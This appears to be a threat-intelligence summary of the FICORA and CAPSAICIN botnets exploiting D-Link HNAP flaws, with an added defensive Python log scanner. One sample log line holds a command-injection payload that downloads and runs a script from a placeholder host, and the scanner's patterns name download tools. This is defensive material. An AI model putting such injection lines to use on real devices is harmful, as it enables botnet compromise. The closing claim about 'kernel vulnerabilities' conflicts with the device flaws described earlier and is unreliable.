Researchers observed increased activity in late 2024 from the Mirai variant “FICORA” and the Kaiten variant “CAPSAICIN” botnets, which exploited known vulnerabilities in D-Link devices, such as CVE-2024-33112, abusing the HNAP protocol to execute malicious commands remotely. The campaign highlights the continued risk posed by unpatched legacy devices.
IPS telemetry reveals the persistent spread of the “FICORA” and “CAPSAICIN” botnets through the reuse of older exploits, while analysis of infected traffic provides insight into the operational characteristics and attack vectors these botnets employ.
The “FICORA” attacks originated from two servers (185.191.126.213 and 185.191.126.248) located in the Netherlands. The attack was widespread and likely not targeted, which indicates the botnet’s global reach and its potential for significant impact.
Unlike “FICORA,” the “CAPSAICIN” botnet showed a brief but intense period of activity on October 21-22, 2024, during which the attackers primarily targeted East Asian countries and actively disseminated the “CAPSAICIN” botnet across the region.
The “FICORA” botnet deploys a shell script named “multi” that downloads the malware using several methods, including wget, ftpget, curl, and tftp, to acquire the components the botnet needs to operate.
The downloader script targets various Linux architectures: it first kills processes whose names carry the same extension as the “FICORA” malware, then uses the architecture information to download and execute the malware, which is encoded with ChaCha20.
“FICORA” is a Mirai variant: it uses hardcoded credentials for brute-force attacks, embeds a shell script that kills competing malware (“dvrHelper”), and carries out DDoS attacks over the UDP, TCP, and DNS protocols.
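As an added defender-side example (not code from the original report), the following Python heuristic scans constructed web-server log lines for HNAP requests whose SOAPAction or body carries shell metacharacters or the download-utility names the report attributes to the FICORA “multi” script. The log format, the soapaction= and body= fields, and the EXAMPLE-C2 host are assumptions made for the sample.

```python
import re

# Constructed sample access-log lines (not real telemetry). The format, the
# soapaction="..." and body="..." fields, and the EXAMPLE-C2 host are assumptions.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2024:10:01:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 312 '
    'soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings" body="<GetDeviceSettings/>"',
    '10.0.0.9 - - [21/Oct/2024:10:01:05 +0000] "POST /HNAP1/ HTTP/1.1" 200 88 '
    'soapaction="http://purenetworks.com/HNAP1/SetDeviceSettings" '
    'body="<Name>`cd /tmp; wget http://EXAMPLE-C2/multi; sh multi`</Name>"',
    '10.0.0.7 - - [21/Oct/2024:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    'soapaction="" body=""',
    '10.0.0.3 - - [21/Oct/2024:10:03:40 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 '
    'soapaction="http://purenetworks.com/HNAP1/Login" '
    'body="<Action>request</Action><Username>admin</Username>"',
]

# Only requests to the HNAP endpoint are of interest; capture the source IP.
HNAP_REQUEST = re.compile(r'^(\S+) .*"(?:POST|GET) /HNAP1/?')
FIELD = re.compile(r'(soapaction|body)="([^"]*)"')
# Shell metacharacters that have no place in a legitimate HNAP SOAP value.
SHELL_META = re.compile(r'[;|`]|\$\(|&&')
# Download utilities the report attributes to the FICORA "multi" script.
DOWNLOADERS = re.compile(r'\b(?:wget|ftpget|curl|tftp)\b')


def flag_hnap_requests(lines):
    """Return (line_no, source_ip, reasons) for HNAP requests whose
    SOAPAction or body carries command-injection indicators."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = HNAP_REQUEST.match(line)
        if not m:
            continue
        # Inspect only the SOAP header and body values, not the request line.
        values = " ".join(v for _, v in FIELD.findall(line))
        reasons = []
        if SHELL_META.search(values):
            reasons.append("shell metacharacters")
        if DOWNLOADERS.search(values):
            reasons.append("download utility")
        if reasons:
            hits.append((n, m.group(1), reasons))
    return hits


if __name__ == "__main__":
    for n, ip, reasons in flag_hnap_requests(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(reasons)}")
```

On the sample above only the second line is flagged; a benign HNAP login and a non-HNAP request pass through untouched.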
The downloader script “bins.sh” retrieves and executes the “CAPSAICIN” malware for various Linux architectures; upon execution, the malware reveals its variant name through a pop-up displaying “CAPSAICIN.”
Once running, “CAPSAICIN” connects to its C2 server and sends information about the victim host, then waits for commands from the C2 server and executes them. It also uses the “PRIVMSG” function to set environment variables, which lets the C2 server control the compromised system remotely.
“CAPSAICIN” is likely a variant of the Keksec group’s botnet. It uses the “PRIVMSG” function to launch DDoS attacks in response to commands received from the C2 server; these commands, together with their accompanying help messages, give the malware a range of attack functions and suggest that its development was influenced by version 17.0.0 of the Keksec group’s botnet.
FortiGuard Labs identified “FICORA” and “CAPSAICIN” exploiting decade-old kernel vulnerabilities; despite available patches, these attacks persist globally. To mitigate the risk, enterprises must proactively update kernels and implement robust monitoring to prevent malware from exploiting these vulnerabilities.